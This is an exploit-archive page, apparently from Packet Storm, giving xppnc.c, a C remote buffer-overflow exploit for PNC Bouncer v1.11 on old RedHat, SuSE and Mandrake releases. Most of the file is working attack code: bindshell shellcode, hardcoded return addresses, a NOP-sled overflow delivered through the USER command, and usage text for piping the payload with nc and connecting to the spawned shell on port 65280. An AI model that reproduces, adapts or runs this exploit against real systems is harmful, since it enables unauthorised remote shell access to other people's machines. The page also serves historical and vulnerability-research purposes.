exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

xppnc.c

xppnc.c
Posted Jul 21, 2000
Authored by RaiSe | Site undersec.com

PNC Bouncer remote exploit - tested against v1.11 on RedHat 6.0, SuSE 6.3, and Mandrake 6.0.

tags | exploit, remote
systems | linux, redhat, suse, mandrake
SHA-256 | f3e7d956629059a23a4eafb60363507ed837755b27f531596180153d41af5c6f

xppnc.c

Change Mirror Download
/* PNC Bouncer Xploit por RaiSe                 */
/* Testeado en version 1.11 */
/* */
/* Offset en RedHat 6.0 0xbffffb24 */
/* Offset en SuSe 6.3 0xbffff824 (Thx |QuasaR|) */
/* Offset en Mandrake 6.0 0xbffff3e4 (Thx PowR) */
/* bindshell by ADM */
/* */
/* UNDERSEC Security Team */
/* http://www.undersec.com */

#include <stdio.h>

int i;
char *ptr;
unsigned long *ptr2,dire;
char bindshell[] =
"\x33\xDB\x33\xC0\xB0\x1B\xCD\x80\x33\xD2\x33\xc0\x8b\xDA\xb0\x06"
"\xcd\x80\xfe\xc2\x75\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x62"
"\xeb\x62\x5e\x56\xac\x3c\xfd\x74\x06\xfe\xc0\x74\x0b\xeb\xf5\xb0"
"\x30\xfe\xc8\x88\x46\xff\xeb\xec\x5e\xb0\x02\x89\x06\xfe\xc8\x89"
"\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe\xc3\x89\xf1\xcd"
"\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\xff\x66\x89\x46\x0e\x8d"
"\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0"
"\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\xeb\x04"
"\xeb\x4c\xeb\x52\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80"
"\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1"
"\xcd\x80\xb8\x2e\x62\x69\x6e\x40\x89\x06\xb8\x2e\x73\x68\x21\x40\x89\x46"
"\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
"\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x45\xff\xff"
"\xff\xFF\xFD\xFF\x50\x72\x69\x76\x65\x74\x20\x41\x44\x4D\x63\x72\x65\x77";

char buffer[1091];

int main(int argc, char *argv[])
{
if (argc<3) {
printf("\nPNC Bouncer Xploit por RaiSe");
printf("\nUNDERSEC Security TEAM\nhttp://www.undersec.com");
printf("\n\nModo de empleo: %s offset n | nc host puerto\n",argv[0]);
printf(" nc host 65280\n\n");
printf("n=1 - RedHat 6.0\nn=2 - SuSe 6.3\nn=3 - Mandrake 6.0\noffset normalmente 0 (en mandrake 1200)\n\n");
exit(0);
}

if ((strcmp(argv[2],"1")) == 0) { dire=0xbffffb24; }
if ((strcmp(argv[2],"2")) == 0) { dire=0xbffff824; }
if ((strcmp(argv[2],"3")) == 0) { dire=0xbffff3e4; }

for(i=0;i<1091;i++)
buffer[i]=0x00;
ptr=buffer;

for(i=0;i<1011-strlen(bindshell);i++)
*(ptr++)=0x90;
for(i=0;i<strlen(bindshell);i++)
*(ptr++)=bindshell[i];
ptr2=(long *)ptr;
for(i=0;i<20;i++)
*(ptr2++)=dire+atoi(argv[1]);

sleep(4);
printf("USER %s\n",buffer);
}
/* www.hack.co.za [19 July]*/
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close